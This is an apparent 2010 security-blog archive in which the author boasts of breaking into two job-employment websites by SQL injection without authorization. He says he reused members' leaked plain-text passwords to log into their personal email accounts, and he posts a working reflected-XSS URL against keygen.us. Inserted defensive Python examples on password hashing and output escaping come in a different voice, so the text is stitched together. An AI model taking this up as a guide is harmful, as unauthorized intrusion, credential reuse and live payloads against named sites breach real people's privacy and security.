Archive for Web security

Job.sy: Hacked

Posted in SQL injection on October 26, 2010 by Xacker

As promised earlier this month, I’ve nailed Job.sy today.. in other words, hacked it 🙂

Here is a screenshot of their admin control panel.. uh oh .. I mean, their new admin control panel 🙂

and another of their user table

Enjoy, and stay tuned for MOARRRRRR 😉


Syriantalent.com: Hacked

Posted in SQL injection on October 14, 2010 by Xacker

A while ago my company email received an advertisement for a job employment website. I bookmarked their URL and paid them a visit that day; by the end of the day they were all dancing with joy.

I had total control over their website, but I’m not into destroying people’s work and ruining their lives.. nah, I ain’t, seriously 😛 .. so I only altered the “Privacy Statement” page, which contains bullsh!t about people’s data being safe and all, as members’ passwords were stored as plain text.

Any attacker who gets through their security measures can have a copy of every member’s phone number, email, password, personal data, CV, personal pictures.. etc.

The funny part is that I know (and you should too) that most people use one password.. two passwords at max for.. listen to this.. for EVERYTHING!

It’s not easy to remember 5 passwords or more. I, for example, use two passwords: one for registration at some random or non-important website; the other I use for my personal email & websites important to me (my blog, my ArabTeam2000 password.. etc.)

I’ve tried a couple of passwords on registered members’ personal emails; some worked, some didn’t (perhaps they’ve changed it since they registered with the website).

One of my friends had an account there. I was able to log in to his Hotmail account and he was like “Oh man! please don’t do anything, I have private stuff there you know.. I trust you dude .. completely” 😀

Finally, if you take a second look at the picture up there and notice the date of the attack, it happened 15 days ago.. here is how much safety you get from them: http://www.syriantalent.com/pages.php?sectionid[]=6&pageid=19&lang=en
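The post makes two defensive points worth showing in code: a user table that stores passwords as plain text hands every credential to whoever reaches it, and because people reuse passwords, that leak also unlocks their mailboxes elsewhere. The following added example (mine, not code from the post or from either website) shows the fix on the storage side: salted PBKDF2-HMAC-SHA256 hashes with a constant-time check, plus a migration of a constructed plain-text table. The table rows, the e-mail addresses and the passwords are all made up for the example.

```python
import hashlib
import hmac
import os

# Constructed sample of what the post describes: a user table that keeps the
# password itself, so one SQL injection reveals every member's credential.
PLAINTEXT_USER_TABLE = [
    {"email": "user1@example.com", "password": "hunter2"},      # constructed
    {"email": "user2@example.com", "password": "letmein123"},   # constructed
]

# PBKDF2-HMAC-SHA256 work factor; a large count is what makes offline
# guessing against a leaked hash table slow.
ITERATIONS = 600_000


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Return a self-describing record: algorithm$iterations$salt$digest (hex)."""
    salt = os.urandom(16)  # fresh random salt per user: equal passwords hash differently
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(digest_hex)
    except ValueError:
        return False  # malformed record: never accept
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    # hmac.compare_digest avoids leaking where the first mismatching byte is
    return hmac.compare_digest(candidate, expected)


def migrate_table(rows):
    """Replace each plain-text password column with a hash record."""
    return [{"email": r["email"], "password_hash": hash_password(r["password"])} for r in rows]


if __name__ == "__main__":
    migrated = migrate_table(PLAINTEXT_USER_TABLE)
    for row in migrated:
        print(row["email"], row["password_hash"][:40] + "...")
    print("login ok:", verify_password("hunter2", migrated[0]["password_hash"]))
    print("wrong pw:", verify_password("hunter3", migrated[0]["password_hash"]))
```

After migration the table no longer contains anything that can be replayed against a member's e-mail account, which is the reuse scenario the post describes; an attacker who dumps it still has to guess each password at the cost of 600,000 hash iterations per attempt.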

Enjoy, and stay tuned for a “Job.sy: Hacked” news 😉

update (26/10/2010): have you waited too long? 😉 check out: https://xacker.wordpress.com/2010/10/26/job-sy-hacked/

KeyGen.us users: vulnerable to XSS attacks

Posted in XSS on October 14, 2010 by Xacker

Keygen.us (porn free) is vulnerable to XSS attacks which might be used against poor users

example:

http://www.keygen.us/search.shtml?q=%22%3E%3Ciframe%20width="100%"%20height="100%"%20style="position:absolute;top:0;left:0"%20src=%22https://xacker.wordpress.com%22%20/%3E&w=cracks

w00ps!

isn’t that my blog ? 🙂

This is a simple demonstration, the attack vector might be extended through Clickjacking and/or Tabjacking techniques.
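The search page echoes the `q` parameter back into its HTML unescaped, so a term that closes the attribute and the tag can inject an `<iframe>` covering the page. The added example below (mine, not code from the post or from the site) shows the vulnerable rendering next to the hardened one: the only change is `html.escape(..., quote=True)` on output. The URL is a constructed one modelled on the post's, with `attacker.example` as a placeholder for the framed address; the `<input>` markup is an assumption about how such a page echoes the term.

```python
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed URL modelled on the one in the post: q closes the attribute and
# the tag it is echoed into, then injects a full-size iframe.
SAMPLE_URL = (
    "http://www.keygen.us/search.shtml?q=%22%3E%3Ciframe%20width%3D%22100%25%22"
    "%20src%3D%22https://attacker.example%22%20/%3E&w=cracks"
)


def query_term(url: str) -> str:
    """Extract the decoded q parameter the way the server would see it."""
    params = parse_qs(urlsplit(url).query)
    return params.get("q", [""])[0]


def render_vulnerable(q: str) -> str:
    # 'Before': the term is placed straight into an attribute value, so a
    # leading "> ends the input tag and whatever follows becomes markup.
    return f'<input type="text" name="q" value="{q}">'


def render_safe(q: str) -> str:
    # 'After': escape on output. quote=True is essential inside attributes,
    # since it turns " into &quot; and so the value can no longer be closed early.
    return f'<input type="text" name="q" value="{escape(q, quote=True)}">'


def contains_injected_tag(html: str) -> bool:
    """Crude detection check: did an iframe tag survive into the page?"""
    return "<iframe" in html.lower()


if __name__ == "__main__":
    q = query_term(SAMPLE_URL)
    print("vulnerable:", render_vulnerable(q))
    print("safe:      ", render_safe(q))
    print("tag injected (vulnerable):", contains_injected_tag(render_vulnerable(q)))
    print("tag injected (safe):      ", contains_injected_tag(render_safe(q)))
```

In the hardened output the term is still shown to the user verbatim (the browser decodes the entities for display) but it is text, not markup, which is why output encoding rather than input filtering is the standard fix for reflected XSS.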

Update: here is a screenshot in case they fix it 🙂

Later.